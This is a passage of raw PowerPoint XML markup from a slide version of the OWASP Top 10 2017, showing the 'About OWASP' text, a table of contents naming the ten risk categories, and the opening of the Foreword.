                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Local chapters worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cutting edge research</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Extensive conferences worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mailing lists</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="sng" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>All of the OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent and open way.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter Leaders, Project Leaders, and project members. We support innovative security research with grants and infrastructure.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Aria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4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="4000" dirty="0"/>
              <a:t>TOC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1238492906"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="5958840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2998816">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="384464">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	TOC	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>About OWASP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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2</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0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	FW	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Foreword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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3</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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	I	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Introduction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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4</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0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	RN	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Release Notes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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>5</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0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	Risk	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Application Security Risks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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6</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2808000" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	T10	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Application Security</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Risks – 2017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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>7</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A1:2017	- Injection	….</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8</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A2:2017	- Broken Authentication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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>9</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A3:2017	- Sensitive Data Exposure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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10</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A4:2017	- XML External Entities (XXE)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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11</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A5:2017	- Broken Access Control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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12</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A6:2017	- Security Misconfiguration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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13</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A7:2017	- Cross-Site Scripting (XSS)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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14</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A8:2017	- Insecure Deserialization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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15</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A9:2017	- Using Components with Known</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerabilities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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16</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A10:2017	- Insufficient Logging &amp; Monitoring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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17</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+D	- What’s Next for Developers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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18</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+T	- What’s Next for Security Testing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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19</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+O	- What’s Next for Organizations…….……..</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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20</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	- What’s Next for Application Managers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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21</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9"/>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+R	- Note About Risks………………………….</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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22</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0"/>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+RF	- Details About Risk Factors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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23</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1"/>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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Dat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>	- Methodology and Data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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24</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2"/>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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Ack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>	- Acknowledgements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30" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>25</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foreword</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD90FCC-E953-489C-88FB-5FEBDDC8B97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1065213"/>
            <a:ext cx="6027399" cy="729430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dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly critical, complex, and connected, the difficulty of achieving application security increases exponentially. The rapid pace of modern software development processes makes risks even more critical to discover quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A great deal of feedback was received during the creation of the OWASP Top 10 2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers, it has become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> de facto application security standard. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We have taken steps in this release to firm up the definition of issues, and improve the recommendations to be leading practices that may be adopted as an application security standard that covers off around 80-90% of all common attacks and threats. We encourage large and high performing organizations to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
